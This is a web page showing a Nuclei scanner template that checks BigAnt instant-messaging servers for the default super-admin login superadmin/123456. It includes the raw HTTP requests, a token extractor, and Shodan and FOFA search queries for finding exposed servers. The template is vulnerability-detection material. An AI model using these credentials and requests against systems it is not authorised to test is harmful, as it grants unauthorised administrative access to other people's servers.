Skip to content

BigAnt - Default Password

ID: bigant-default-login

Severity: critical

Author: ritikchaddha

Tags: default-login,bigant

Misconfiguratoin leads to Default Login into BigAnt Super Admin Account.

id: bigant-default-login
info:
name: BigAnt - Default Password
author: ritikchaddha
severity: critical
description: |
Misconfiguratoin leads to Default Login into BigAnt Super Admin Account.
reference:
- https://www.bigantsoft.com/support/faq/2-4_How_to_switch_login_accounts_System_admin_Security_admin_Audit_admin_super_admin.html#:~:text=How%2Dto-,How%20to%20switch%20login%20accounts%3A%20System%20admin%2FSecurity%20admin%2F,password%20is%20123456%20by%20default.
classification:
cwe-id: CWE-522
metadata:
verified: true
max-request: 2
shodan-query: title:"BigAnt"
fofa-query: title="BigAnt"
tags: default-login,bigant
variables:
username: "superadmin"
password: "123456"
http:
- raw:
- |
GET /index.php/Home/login/index.html HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php/Home/Login/login_post.html HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
saas=default&account={{username}}&password={{base64(password)}}&to=admin&app=&__hash__={{hash}}&__hash__={{hash}}&submit=
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "Login Successfully! Loading..."
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
name: hash
group: 1
regex:
- 'name="__hash__" content="([0-9a-z_]+)"'
internal: true
# digest: 4b0a00483046022100a00fbaffd63d9fae9c46abbfac8fa9959483cda2c2ac6616984b6eceb6e37ae80221009043491857bbefe19003da32be3a048e90d24f2b23a97f981bca7b717e6914be:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/bigant/bigant-default-login.yaml"

View on Github